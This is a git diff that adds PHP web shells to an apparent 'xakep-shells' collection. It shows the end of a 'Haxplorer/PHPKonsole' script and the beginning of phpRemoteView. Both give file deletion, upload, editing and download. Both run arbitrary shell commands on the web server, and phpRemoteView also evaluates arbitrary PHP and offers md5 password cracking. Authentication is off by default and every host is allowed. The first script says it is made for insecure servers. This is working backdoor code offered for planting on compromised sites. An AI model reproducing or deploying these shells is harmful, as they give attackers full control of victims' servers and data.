+     	<input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">
+     	<input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">
+     	<input type=\"hidden\" name=\"file\" value=\"$file\">
+     	<input type=\"hidden\" name=\"auth\" value=\"yes\">
+     	<input type=\"submit\" value=\"Yes\"></form>
+        <form action=\"$SFileName?$urlAdd\" method=\"POST\">
+	<input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
+	<input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
+	<input tabindex=\"0\" type=\"submit\" value=\"NO!\"></form>";
+        }
+ 	echo "</td></tr></center>";
+}
+ elseif ( $cmd=="delfile" ) { /*<!-- Delete a file --> */	echo "<center><table><tr><td NOWRAP>" ;
+ 	if ($auth == "yes") {
+		if (@unlink($file)==false) {
+ 			echo "Could not remove \"$file\"<br>";
+  		}
+ 		else {
+ 			echo "Successfully removed \"$file\"<br>";
+ 		}
+		echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\"></form>";
+        }
+ 	else {
+       	echo "Are you sure you want to delete \"$file\" ?
+      	<form action=\"$SFileName?$urlAdd\" method=\"POST\">
+     	<input type=\"hidden\" name=\"cmd\" value=\"delfile\">
+     	<input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">
+     	<input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">
+     	<input type=\"hidden\" name=\"file\" value=\"$file\">
+     	<input type=\"hidden\" name=\"auth\" value=\"yes\">
+
+     	<input type=\"submit\" value=\"Yes\"></form>
+       	<form action=\"$SFileName?$urlAdd\" method=\"POST\">
+	<input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
+	<input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
+	<input tabindex=\"0\" type=\"submit\" value=\"NO!\"></form>";
+        }
+ 	echo "</td></tr></center>";
+}
+elseif ( $cmd=="newfile" ) { /*<!-- Create new file with default name --> */
+	echo "<center><table><tr><td NOWRAP>";
+ 	$i = 1;
+ 	while (file_exists("$lastdir/newfile$i.txt"))
+ 		$i++;
+ 	$file = fopen("$lastdir/newfile$i.txt", "w+");
+ 	if ($file == false)
+ 		echo "Could not create the new file...<br>";
+ 	else
+ 		echo "Successfully created: \"$lastdir/newfile$i.txt\"<br>";
+ 		echo "
+   			<form action=\"$SFileName?$urlAdd\" method=\"POST\">
+			<input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
+			<input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
+			<input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\">
+			</form></center>
+ 			</td></tr></table></center>   		";
+	}
+elseif ( $cmd=="newdir" ) { /*<!-- Create new directory with default name --> */
+	echo "<center><table><tr><td NOWRAP>" ;
+ 	$i = 1;
+ 	while (is_dir("$lastdir/newdir$i"))
+  		$i++;
+ 	$file = mkdir("$lastdir/newdir$i", 0777);
+ 	if ($file == false)
+ 		echo "Could not create the new directory...<br>";
+ 	else
+ 		echo "Successfully created: \"$lastdir/newdir$i\"<br>";
+ 	echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\">
+		<input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
+		<input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
+		<input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\">
+		</form></center></td></tr></table></center>";
+}
+elseif ( $cmd=="edit" ) { /*<!-- Edit a file and save it afterwards with the saveedit block. --> */
+	$contents = "";
+	$fc = @file( $file );
+  	while ( @list( $ln, $line ) = each( $fc ) ) {
+  		$contents .= htmlentities( $line ) ;
+ 	}
+ 	echo "<br><center><table><tr><td NOWRAP>";
+	echo "M<form action=\"$SFileName?$urlAdd\" method=\"post\">\n";
+	echo "<input type=\"hidden\" name=\"cmd\" value=\"saveedit\">\n";
+	echo "<strong>EDIT FILE: </strong>$file<br>\n";
+	echo "<textarea rows=\"25\" cols=\"95\" name=\"contents\">$contents</textarea><br>\n";
+	echo "<input size=\"50\" type=\"text\" name=\"file\" value=\"$file\">\n";
+	echo "<input type=\"submit\" value=\"Save\">";
+	echo "</form>";
+	echo "</td></tr></table></center>";
+}
+elseif ( $cmd=="saveedit" ) { /*<!-- Save the edited file back to a file --> */
+	$fo = fopen($file, "w");
+	$wrret = fwrite($fo, stripslashes($contents));
+	$clret = fclose($fo);
+}
+elseif ( $cmd=="downl" ) { /*<!-- Save the edited file back to a file --> */
+	$downloadfile = urldecode($file);
+	if (function_exists("basename"))
+    		$downloadto = basename ($downloadfile);
+	else
+		$downloadto = "download.ext";
+	if (!file_exists("$downloadfile"))
+		echo "The file does not exist";
+	else {
+		$size = @filesize("$downloadfile");
+		if ($size != false) {
+			$add="; size=$size";
+		}			
+		else {
+			$add="";
+		}
+ 		header("Content-Type: application/download");
+		header("Content-Disposition: attachment; filename=$downloadto$add");
+		$fp=fopen("$downloadfile" ,"rb");
+		fpassthru($fp);
+		flush();
+	}
+}
+elseif ( $cmd=="upload" ) { /* <!-- Upload File form --> */ 
+   	?>
+	<center>
+	 <table>
+	  <tr>
+	   <td NOWRAP>
+    		Welcome to the upload section...
+ 		Please note that the destination file will be
+		<br> overwritten if it already exists!!!<br><br>
+ 		<form enctype="multipart/form-data" action="<?php echo "$SFileName?$urlAdd" ?>" method="post">
+ 			<input type="hidden" name="MAX_FILE_SIZE" value="1099511627776">
+ 			<input type="hidden" name="cmd" value="uploadproc">
+ 			<input type="hidden" name="dir" value="<?php echo $dir ?>">
+ 			<input type="hidden" name="lastcmd" value="<?php echo $lastcmd ?>">
+ 			<input type="hidden" name="lastdir" value="<?php echo $lastdir ?>">
+ 			Select local file:<br>
+ 			<input size="75" name="userfile" type="file"><br>
+ 			<input type="submit" value="Send File">
+ 		</form>
+		<br>
+ 		<form action="<?php echo "$SFileName?$urlAdd" ?>" method="POST">
+			<input type="hidden" name="cmd" value="<?php echo $lastcmd ?>">
+			<input type="hidden" name="dir" value="<?php echo $lastdir ?>">
+			<input tabindex="0" type="submit" value="Cancel">
+		</form>
+	   </td>
+	  </tr>
+	 </table>
+	</center>
+
+ 	<?php
+}
+elseif ( $cmd=="uploadproc" ) { /* <!-- Process Uploaded file --> */
+	echo "<center><table><tr><td NOWRAP>";
+	if (file_exists($userfile))
+		$res = copy($userfile, "$dir/$userfile_name");
+	echo "Uploaded \"$userfile_name\" to \"$userfile\"; <br>\n";
+     	if ($res) {
+		echo "Successfully moved \"$userfile\" to \"$dir/$userfile_name\".\n<br><br>";
+		echo "Local filename: \"$userfile_name\".\n<br>Remote filename: \"$userfile\".\n<br>";
+		echo "Filesize: ".formatsize($userfile_size).".\n<br>Filetype: $userfile_type.\n<br>";
+	}
+	else {
+		echo "Could not move uploaded file; Action aborted...";
+	}
+	echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\"></form></center>" ;
+	echo "<br><br></td></tr></table></center>";
+}
+elseif ( $cmd=="file" ) { /* <!-- View a file in text --> */
+        echo "<hr>"; 
+	$fc = @file( $file );  	while ( @list( $ln, $line ) = each( $fc ) ) {
+  		echo spacetonbsp(@htmlentities($line))."<br>\n";
+  	}
+	echo "<hr>";
+}
+elseif ( $cmd=="ren" ) { /* <!-- File and Directory Rename --> */
+     	if (function_exists('is_dir')) {
+ 		if (is_dir("$oldfile")) {
+ 			$objname = "Directory";
+ 			$objident = "Directory";
+  		}
+ 		else {
+ 			$objname = "Filename";
+ 			$objident = "file";
+ 		}
+ 	}
+   	echo "<table width=100% border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr><td width=100% style=\"class=\"silver border\"><center>&nbsp;Rename a file:&nbsp;</center></td></tr></table><br>\n";
+	If (empty($newfile) != true) {
+ 		echo "<center>";
+	 	$return = @rename($oldfile, "$olddir$newfile");
+		if ($return) {
+ 			echo "$objident renamed successfully:<br><br>Old $objname: \"$oldfile\".<br>New $objname: \"$olddir$newfile\"";
+ 		}
+ 		else {
+ 			if ( @file_exists("$olddir$newfile") ) {
+ 				echo "Error: The $objident does already exist...<br><br>\"$olddir$newfile\"<br><br>Hit your browser's back to try again...";
+ 			}
+ 			else {
+ 				echo "Error: Can't copy the file, the file could be in use or you don't have permission to rename it.";
+ 			}
+  		}
+ 		echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\"></form></center>" ;
+ 	}
+ 	else {
+ 		$dpos = strrpos($oldfile, "/");
+ 		if (strval($dpos)!="") {
+ 			$olddir = substr($oldfile, 0, $dpos+1);
+   		}
+ 		else {
+ 			$olddir = "$lastdir/";
+		}
+ 		$fpos = strrpos($oldfile, "/");
+ 		if (strval($fpos)!="") {
+ 			$inputfile = substr($oldfile, $fpos+1);
+   		}
+ 		else {
+	 		$inputfile = "";
+ 		}
+       		echo "<center><table><tr><td><form action=\"$SFileName?$urlAdd\" method=\"post\">\n";
+ 		echo "<input type=\"hidden\" name=\"cmd\" value=\"ren\">\n";
+ 		echo "<input type=\"hidden\" name=\"oldfile\" value=\"$oldfile\">\n";
+ 		echo "<input type=\"hidden\" name=\"olddir\" value=\"$olddir\">\n";
+ 		echo "<input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">\n";
+ 		echo "<input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">\n";
+ 		echo "Rename \"$oldfile\" to:<br>\n";
+ 		echo "<input size=\"100\" type=\"text\" name=\"newfile\" value=\"$inputfile\"><br><input type=\"submit\" value=\"Rename\">"; 
+		echo "</form><form action=\"$SFileName?$urlAdd\" method=\"post\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input type=\"submit\" value=\"Cancel\"></form>";
+ 		echo "</td></tr></table></center>";
+ 	}
+}
+else if ( $cmd == "con") {
+
+?>
+<center>
+<table>
+ <tr><td>
+<h3>PHPKonsole</h3>
+
+<?php
+
+if (ini_get('register_globals') != '1') {
+    if (!empty($HTTP_POST_VARS))
+	extract($HTTP_POST_VARS);
+	  
+    if (!empty($HTTP_GET_VARS))
+	extract($HTTP_GET_VARS);
+	      
+    if (!empty($HTTP_SERVER_VARS))
+	extract($HTTP_SERVER_VARS);
+    }
+		    
+    if (!empty($work_dir)) {
+	if (!empty($command)) {
+	    if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {
+	        if ($regs[1][0] == '/') {
+	            $new_dir = $regs[1];
+		} else {
+		    $new_dir = $work_dir . '/' . $regs[1];
+		}
+		if (file_exists($new_dir) && is_dir($new_dir)) {
+		    $work_dir = $new_dir;
+		}
+		unset($command);
+	    }
+	}
+    }
+    if (file_exists($work_dir) && is_dir($work_dir)) {
+	chdir($work_dir);
+    }
+    $work_dir = exec('pwd');
+?>
+
+    <form name="myform" action="<?php echo "$PHP_SELF?$urlAdd" ?>" method="post">
+	<table border=0 cellspacing=0 cellpadding=0 width="100%"><tr><td>Current working directory: <b>
+	<input type="hidden" name="cmd" value="con">
+	<?php
+	    $work_dir_splitted = explode('/', substr($work_dir, 1));
+	    printf('<a href="%s?$urlAddcmd=con&stderr=%s&work_dir=/">Root</a>/', $PHP_SELF, $stderr);
+	    if (!empty($work_dir_splitted[0])) {
+		$path = '';
+		for ($i = 0; $i < count($work_dir_splitted); $i++) {
+		    $path .= '/' . $work_dir_splitted[$i];
+		    printf('<a href="%s?$urlAddcmd=con&stderr=%s&work_dir=%s">%s</a>/', $PHP_SELF, $stderr, urlencode($path), $work_dir_splitted[$i]);
+		}
+	    }
+	?></b></td>
+	<td align="right">Choose new working directory: <select class="inputtext" name="work_dir" onChange="this.form.submit()">
+	
+	<?php
+	$dir_handle = opendir($work_dir);
+	while ($dir = readdir($dir_handle)) {
+	    if (is_dir($dir)) {
+		if ($dir == '.') {
+		    echo "<option value=\"$work_dir\" selected>Current Directory</option>\n";
+		} elseif ($dir == '..') {
+		    if (strlen($work_dir) == 1) {
+		    }
+		    elseif (strrpos($work_dir, '/') == 0) {
+			echo "<option value=\"/\">Parent Directory</option>\n";
+		    } else {
+			echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"), 1)) ."\">Parent Directory</option>\n";
+		    }
+		} else {
+		    if ($work_dir == '/') {
+			echo "<option value=\"$work_dir$dir\">$dir</option>\n";
+		    } else {
+			echo "<option value=\"$work_dir/$dir\">$dir</option>\n";
+		    }
+		}
+	    }
+	}
+	closedir($dir_handle);
+	?>
+	</select></td></tr></table>
+	<p>Command: <input class="inputtext" type="text" name="command" size="60">
+	<input name="submit_btn" class="inputbutton" type="submit" value="Execute Command"></p>
+	<p>Enable <code>stderr</code>-trapping? <input type="checkbox" name="stderr"<?php if (($stderr) || (!isset($stderr)) ) echo " CHECKED"; ?>></p>
+	<textarea cols="80" rows="19" class="inputtextarea" wrap=off readonly><?php
+	    if (!empty($command)) {
+	        echo "phpKonsole> ". htmlspecialchars($command) . "\n\n"; 
+		if ($stderr) {
+		    $tmpfile = tempnam('/tmp', 'phpshell');
+		    $command .= " 1> $tmpfile 2>&1; " . "cat $tmpfile; rm $tmpfile";
+		} else if ($command == 'ls') {
+		    $command .= ' -F';
+		}
+		$output = `$command`;
+		echo htmlspecialchars($output);
+	    }
+	?></textarea>
+    </form>
+																													      
+    <script language="JavaScript" type="text/javascript">
+	document.forms[0].command.focus();
+    </script>
+ </td></tr></table>
+<?php
+}    
+else { /* <!-- There is a incorrect or no parameter specified... Let's open the main menu --> */
+	$isMainMenu = true;
+     ?>
+	<table width="100%" border="0" cellpadding="0" cellspacing="0">
+	 <tr>
+	  <td width="100%" class="border">
+	   <center>&nbsp;-<[{ <?php echo $scriptTitle ?> Main Menu }]>-&nbsp;</center>
+	  </td>
+	 </tr>
+	</table>
+	<br>
+ 	<center>
+	<table border="0" NOWRAP>
+ 	 <tr>
+	  <td valign="top" class="silver border">
+           <?php echo buildUrl( sp(2)."<font color=\"navy\"><strong>==> Haxplorer <==</strong></font>", "cmd=dir&dir=.").sp(2); ?>
+	  </td>
+ 	  <td style="BORDER-TOP: silver 1px solid;" width=350 NOWRAP>
+	   Haxplorer is a server side file browser wich (ab)uses the directory object to list
+ 	   the files and directories stored on a webserver. This handy tools allows you to manage
+ 	   files and directories on a unsecure server with php support.<br><br>This entire script
+ 	   is coded for unsecure servers, if your server is secured the script will hide commands
+ 	   or will even return errors to your browser...<br><br>
+	  </td>
+	 </tr>
+ 	 <tr>
+	  <td valign="top" class="silver border">
+           <?php echo buildUrl( sp(2)."<font color=\"navy\"><strong>==> PHPKonsole <==</strong></font>", "cmd=con").sp(2); ?>
+	  </td>
+ 	  <td style="BORDER-TOP: silver 1px solid;" width=350 NOWRAP>
+	   <br>PHPKonsole is just a little telnet like shell wich allows you to run commands on the webserver.
+	    When you run commands they will run as the webservers UserID. This should work perfectly
+	    for managing files, like moving, copying etc. If you're using a linux server, system commands
+	    such as ls, mv and cp will be available for you... <br><br>This function will only work if the
+	    server supports php and the execute commands...<br><br>
+	  </td>
+	 </tr>
+        </table>
+	</center>
+	<br>
+     <?php
+}
+
+if ($cmd != "downl") {
+	if ( $isMainMenu != true) {
+ 		?>
+		<table width="100%" border="0" cellpadding="0" cellspacing="0">
+		 <tr>
+		  <td width="100%" style="class="silver border">
+		   <center><strong>
+		    &nbsp;&nbsp;<?php echo buildUrl("<font color=\"navy\">[&nbsp;Main Menu&nbsp;]  </font>", "cmd=&dir=");      ?>&nbsp;&nbsp;
+		    &nbsp;&nbsp;<?php echo buildUrl("<font color=\"navy\">[&nbsp;PHPKonsole&nbsp;] </font>", "cmd=con");        ?>&nbsp;&nbsp;
+                    &nbsp;&nbsp;<?php echo buildUrl("<font color=\"navy\">[&nbsp;Haxplorer&nbsp;]  </font>", "cmd=dir&dir=.");  ?> &nbsp;&nbsp;
+ 		   </strong></center>
+		  </td>
+		 </tr>
+		</table>
+		<br>
+		<?php
+}
+	?>
+	<table width=100% border="0" cellpadding="0" cellspacing="0">
+	 <tr>
+	  <td width="100%" class="silver border">
+	   <center>&nbsp;<?php echo $scriptident ?> - <?php echo $scriptver ?> - <?php echo $scriptdate ?>&nbsp;</center>
+	  </td>
+	 </tr>
+	</table>
+ 	   </td>
+  </tr>
+ </table>
+
+  <?php
+ }
+
+?>
diff --git a/xakep-shells/PHP/PHPRemoteView.php.txt b/xakep-shells/PHP/PHPRemoteView.php.txt
new file mode 100644
index 0000000..4d6e436
--- /dev/null
+++ b/xakep-shells/PHP/PHPRemoteView.php.txt
@@ -0,0 +1,2553 @@
+<?php
+
+/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
+ *
+ *  Welcome to phpRemoteView (RemView) 
+ *
+ *  View/Edit remove file system:
+ *  - view index of directory (/var/log - view logs, /tmp - view PHP sessions)
+ *  - view name, size, owner:group, perms, modify time of files
+ *  - view html/txt/image/session files
+ *  - download any file and open on Notepad
+ *  - create/edit/delete file/dirs
+ *  - executing any shell commands and any PHP-code
+ *
+ *  Free download from http://php.spb.ru/remview/
+ *  Version 04c, 2003-10-23. 
+ *  Please, report bugs...
+ *
+ *  This programm for Unix/Windows system and PHP4 (or higest).
+ *
+ *  (c) Dmitry Borodin, dima@php.spb.ru, http://php.spb.ru
+ *
+ * * * * * * * * * * * * * * * * * WHATS NEW * * * * * * * * * * * * * * * *
+ *
+ * --version4--
+ *  2003.10.23 support short <?php ?> tags, thanks A.Voropay
+ *
+ *  2003.04.22 read first 64Kb of null-size file (example: /etc/zero), 
+ *                thanks Anight
+ *             add many functions/converts: md5, decode md5 (pass crack), 
+ *                date/time, base64, translit, russian charsets
+ *             fix bug: read session files
+ *
+ *  2002.08.24 new design and images
+ *             many colums in panel
+ *             sort & setup panel
+ *             dir tree
+ *             base64 encoding
+ *             character map
+ *             HTTP authentication with login/pass
+ *             IP-address authentication with allow hosts
+ *
+ * --version3--
+ *  2002.08.10 add multi language support (english and russian)
+ *             some update
+ *
+ *  2002.08.05 new: full windows support
+ *             fix some bugs, thanks Jeremy Flinston
+ * 
+ *  2002.07.31 add file upload for create files
+ *             add 'direcrory commands'
+ *             view full info after safe_mode errors
+ *             fixed problem with register_glogals=off in php.ini
+ *             fixed problem with magic quotes in php.ini (auto strip slashes)
+ *
+ * --version2--
+ *  2002.01.20 add panel 'TOOLS': eval php-code and run shell commands
+ *             add panel 'TOOLS': eval php-code and run shell commands
+ *             add copy/edit/create file (+panel 'EDIT')
+ *             add only-read mode (disable write/delete and PHP/Shell)
+ *
+ *  2002.01.19 add delete/touch/clean/wipe file
+ *             add panel 'INFO', view a/c/m-time, hexdump view
+ *             add session file view mode (link 'SESSION').
+ *
+ *  2002.01.12 first version!
+ *
+ * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */
+
+///////////////////////////////// S E T U P ///////////////////////////////////
+
+   
+   $version="2003-10-23";
+
+   $hexdump_lines=8;        // lines in hex preview file
+   $hexdump_rows=24;        // 16, 24 or 32 bytes in one line
+
+   $mkdir_mode=0755;        // chmode for new dir ('MkDir' button)
+
+   $maxsize_fread=65536;    // read first 64Kb from any null-size file
+
+   // USER ACCESS //
+
+   $write_access=true;      // true - user (you) may be write/delete files/dirs
+                            // false - only read access
+
+   $phpeval_access=true;    // true - user (you) may be execute any php-code
+                            // false - function eval() disable
+   
+   $system_access=true;     // true - user (you) may be run shell commands
+                            // false - function system() disable
+   
+   // AUTHORIZATION //
+
+   $login=false;            // Login & password for access to this programm.
+   $pass=false;             // Example: $login="MyLogin"; $pass="MyPaSsWoRd";
+                            // Type 'login=false' for disable authorization.
+
+   $host_allow=array("*");  // Type list of your(allow) hosts. All other - denied.
+                            // Example: $host_allow=array("127.0.0.*","localhost")
+
+
+///////////////////////////////////////////////////////////////////////////////
+
+
+   $tmp=array();
+   foreach ($host_allow as $k=>$v)
+      $tmp[]=str_replace("\\*",".*",preg_quote($v));
+   $s="!^(".implode("|",$tmp).")$!i";
+   if (!preg_match($s,getenv("REMOTE_ADDR")) && !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) 
+      exit("<h1><a href=http://php.spb.ru/remview/>phpRemoteView</a>: Access Denied - your host not allow</h1>\n");
+   if ($login!==false && (!isset($HTTP_SERVER_VARS['PHP_AUTH_USER']) || 
+      $HTTP_SERVER_VARS['PHP_AUTH_USER']!=$login || $HTTP_SERVER_VARS['PHP_AUTH_PW']!=$pass)) {
+      header("WWW-Authenticate: Basic realm=\"phpRemoteView\"");
+      header("HTTP/1.0 401 Unauthorized");
+      exit("<h1><a href=http://php.spb.ru/remview/>phpRemoteView</a>: Access Denied - password erroneous</h1>\n");
+   }
+
+   error_reporting(2047);
+   set_magic_quotes_runtime(0);
+   @set_time_limit(0);
+   @ini_set('max_execution_time',0);
+   @ini_set('output_buffering',0);
+   if (function_exists("ob_start") && (!isset($c) || $c!="md5crack")) ob_start("ob_gzhandler");
+
+   $self=basename($HTTP_SERVER_VARS['PHP_SELF']);
+
+   $url="http://".getenv('HTTP_HOST').
+        (getenv('SERVER_PORT')!=80 ? ":".getenv('SERVER_PORT') : "").
+        $HTTP_SERVER_VARS['PHP_SELF'].
+        (getenv('QUERY_STRING')!="" ? "?".getenv('QUERY_STRING') : "");
+   $uurl=urlencode($url);
+
+   //
+   // antofix 'register globals': $HTTP_GET/POST_VARS -> normal vars;
+   //
+   $autovars1="c d f php skipphp pre nlbr xmp htmls shell skipshell pos ".
+              "ftype fnot c2 confirm text df df2 df3 df4 ref from to ".
+              "fatt showfile showsize root name ref names sort sortby ".
+              "datetime fontname fontname2 fontsize pan limit convert fulltime fullqty";
+   foreach (explode(" ",$autovars1) as $k=>$v)  {
+      if (isset($HTTP_POST_VARS[$v])) $$v=$HTTP_POST_VARS[$v];
+         elseif (isset($HTTP_GET_VARS[$v])) $$v=$HTTP_GET_VARS[$v];
+            //elseif (isset($HTTP_COOKIE_VARS[$v])) $$v=$HTTP_COOKIE_VARS[$v];
+   }
+
+   //
+   // autofix 'magic quotes':
+   //
+   $autovars2="php shell text d root convert";
+   if (get_magic_quotes_runtime() || get_magic_quotes_gpc()) {
+      foreach (explode(" ",$autovars2) as $k=>$v) {
+         if (isset($$v)) $$v=stripslashes($$v);
+      }
+   }
+
+   $cp_def=array(
+      "001001",
+      "nst2ac",
+      "d/m/y H:i",
+      "Tahoma",
+      "9"
+      );
+
+   $panel=0;
+   if (isset($HTTP_COOKIE_VARS["cp$panel"])) 
+      $cp=explode("~",$HTTP_COOKIE_VARS["cp$panel"]); 
+   else 
+      $cp=$cp_def;
+   $cc=$cp[0];
+   $cn=$cp[1];
+
+/*
+
+$cc / $cp[0]- ñïèñîê îäíîáóêâåííûõ ïàðàìåòðîâ, ñêîïèðîâàíî â $cs:
+   $cc[0] - ïî êàêîé êîëîíêå ñîðòèðîâàòü, à åñëè ýòî íå öèôðà:
+               n - ïî èìåíè
+               e - ðàñøèðåíèå
+   $cc[1] - ïîðÿäîê (0 - âîçðàñò. 1 - óáûâàþùèé)
+   $cc[2] - ïîêàçûâàòü ëè èêîíêè
+   $cc[3] - ÷òî äåëàòü ïðè êëèêå ïî èêîíêå ôàéëà:
+               0 - ïðîñìîòð â text/plain
+               1 - ïðîñìîòð â html
+               2 - download
+               3 - ïàðàìåòðû ôàéëà (info)
+   $cc[4] - îêðóãëÿòü ðàçìåð ôàéëîâ äî Êá/Ìá/Ãá
+   $cc[5] - ÿçûê:
+               1 - àíãëèéñêèé
+               2 - ðóññêè
+
+$cn / $cp[1] - ñïèñîê êîëîíîê è èõ ïîðÿäîê, êîòîðûå ïîêàçûâàòü, ñòðîêà áóêâ/öèôð:
+   t - type
+   n - name
+   s - size
+   a - owner+group
+   o - owner
+   g - group
+   c - chmod
+   1 - create time
+   2 - modify time
+   3 - access time
+
+$cp[2]: ôîðìàò âðåìåíè
+
+$cp[3]: èìÿ øðèôòà
+
+$cp[4]: ðàçìåð øðèôòà
+
+*/
+
+   // Êàê âûðàâíèâàòü êîëîíêè
+   $cn_align=array();
+   $cn_align['t']='center';
+   $cn_align['n']='left';
+   $cn_align['s']='right';
+   $cn_align['a']='center';
+   $cn_align['o']='center';
+   $cn_align['g']='center';
+   $cn_align['c']='center';
+   $cn_align['1']='center';
+   $cn_align['2']='center';
+   $cn_align['3']='center';
+
+
+///////////////////////////////////////////////////////////////////////////////
+
+
+/*--mmstart--*/
+$mm=array(
+"Index of"=>"Èíäåêñ",
+"View file"=>"Ïîêàç ôàéëà",
+"DISK"=>"ÄÈÑÊ",
+"Info"=>"Èíôî",
+"Plain"=>"Ïðÿìîé",
+"HTML"=>"HTML",
+"Session"=>"Ñåññèÿ",
+"Image"=>"Êàðòèíêà",
+"Notepad"=>"Áëîêíîò",
+"DOWNLOAD"=>"ÇÀÃÐÓÇÈÒÜ",
+"Edit"=>"Ïðàâêà",
+"Sorry, this programm run in read-only mode."=>"Èçâèíèòå, ýòà ïðîãðàììà ðàáîòàåò â ðåæèìå 'òîëüêî ÷òåíèå'.",
+"For full access: write"=>"Äëÿ ïîëíîãî äîñòóïà: íàïèøèòå",
+"in this php-file"=>"â ýòîì php-ôàéëå",
+"Reason"=>"Ïðè÷èíà",
+"Error path"=>"Îøèáî÷íûé ïóòü",
+"Click here for start"=>"Íàæìèòå äëÿ ñòàðòà",
+"up directory"=>"êàòàëîã âûøå",
+"access denied"=>"äîñòóï çàïðåùåí",
+"REMVIEW TOOLS"=>"ÓÒÈËÈÒÛ REMVIEW",
+"version"=>"âåðñèÿ",
+"Free download"=>"Áåñïëàòíàÿ çàãðóçêà",
+"back to directory"=>"âåðíóòüñÿ â êàòàëîã",
+"Size"=>"Ðàçìåð",
+"Owner"=>"Îâíåð",
+"Group"=>"Ãðóïïà",
+"FileType"=>"Òèï ôàéëà",
+"Perms"=>"Ïðàâà",
+"Create time"=>"Âðåìÿ ñîçäàíèÿ",
+"Access time"=>"Âðåìÿ äîñòóïà",
+"MODIFY time"=>"Âðåìÿ ÈÇÌÅÍÅÍÈß",
+"HEXDUMP PREVIEW"=>"ÏÐÅÄÏÐÎÑÌÎÒÐ Â 16-ÐÈ×ÍÎÌ ÂÈÄÅ",
+"ONLY READ ACCESS"=>"ÄÎÑÒÓÏ ÒÎËÜÊÎ ÍÀ ×ÒÅÍÈÅ",
+"Can't READ file - access denied"=>"Íå ìîãó ïðî÷èòàòü - äîñòóï çàïðåùåí",
+"full read/write access"=>"ïîëíûé äîñòóï íà ÷òåíèå/çàïèñü",
+"FILE SYSTEM COMMANDS"=>"ÊÎÌÀÍÄÛ ÔÀÉËÎÂÎÉ ÑÈÑÒÅÌÛ",
+"EDIT"=>"ÐÅÄÀÊÒ.",
+"FILE"=>"ÔÀÉË",
+"DELETE"=>"ÑÒÅÐÅÒÜ",
+"Delete this file"=>"Ñòåðåòü ôàéë",
+"CLEAN"=>"Î×ÈÑÒÈÒÜ",
+"TOUCH"=>"ÎÁÍÎÂÈÒÜ",
+"Set current 'mtime'"=>"Óñòàí.òåêóù.âðåìÿ",
+"WIPE(delete)"=>"ÓÍÈ×ÒÎÆÈÒÜ",
+"Write '0000..' and delete"=>"Çàáèòü íóëÿìè, ñòåðåòü",
+"COPY FILE"=>"ÊÎÏÈÐÎÂÀÒÜ ÔÀÉË",
+"COPY"=>"ÊÎÏÈÐÎÂÀÒÜ",
+"MAKE DIR"=>"ÑÎÇÄÀÒÜ ÊÀÒÀËÎÃ",
+"type full path"=>"ââåäèòå ïîëíûé ïóòü",
+"MkDir"=>"Ñîçä.Êàò.",
+"CREATE NEW FILE or override old file"=>"ÑÎÇÄÀÒÜ ÍÎÂÛÉ ÔÀÉË èëè ïåðåçàïèñàòü ñòàðûé",
+"CREATE/OVERRIDE"=>"ÑÎÇÄÀÒÜ/ÏÅÐÅÇÀÏÈÑÀÒÜ",
+"select file on your local computer"=>"âûáðàòü ôàéë íà âàøåì ëîêàëüíîì êîìïüþòåðå",
+"save this file on path"=>"ñîõðàíèòü ýòîò ôàéë â êàòàëîã",
+"create file name automatic"=>"ïðèäóìàòü èìÿ ôàéëó àâòîìàòè÷åñêè",
+"OR"=>"ÈËÈ",
+"type any file name"=>"ââåñòè èìÿ ôàéëà âðó÷íóþ",
+"convert file name to lovercase"=>"êîíâåðòèðîâàòü èìÿ â íèæíèé ðåãèñòð",
+"Send File"=>"Ïîñëàòü ôàéë",
+"Delete all files in dir"=>"Óäàëèòü âñå ôàéëû",
+"Delete all dir/files recursive"=>"Óäàëèòü ÂÑÅ +ïîäêàòàëîãè ðåêóðñèâíî",
+"Confirm not found (go back and set checkbox)"=>"Ïîäòâåðæäåíèå íå ïîñòàâëåíî (âåðíèòåñü íàçàä è ïîñòàâüòå ãàëî÷êó)",
+"Delete cancel - File not found"=>"Óäàëåíèå îòìåíåíî - Ôàéë íå íàéäåí",
+"YES"=>"ÄÀ",
+"ME"=>"ÌÅÍß",
+"NO (back)"=>"ÍÅÒ (íàçàä)",
+"Delete cancel"=>"Óäàëåíèå îòìåíåíî",
+"ACCESS DENIED"=>"ÄÎÑÒÓÏ ÇÀÏÐÅÙÅÍ",
+"done (go back)"=>"ãîòîâî (íàçàä)",
+"Delete ok"=>"Îê, óäàëåííî",
+"Touch cancel"=>"Îáíîâëåíèå îòìåíåíî",
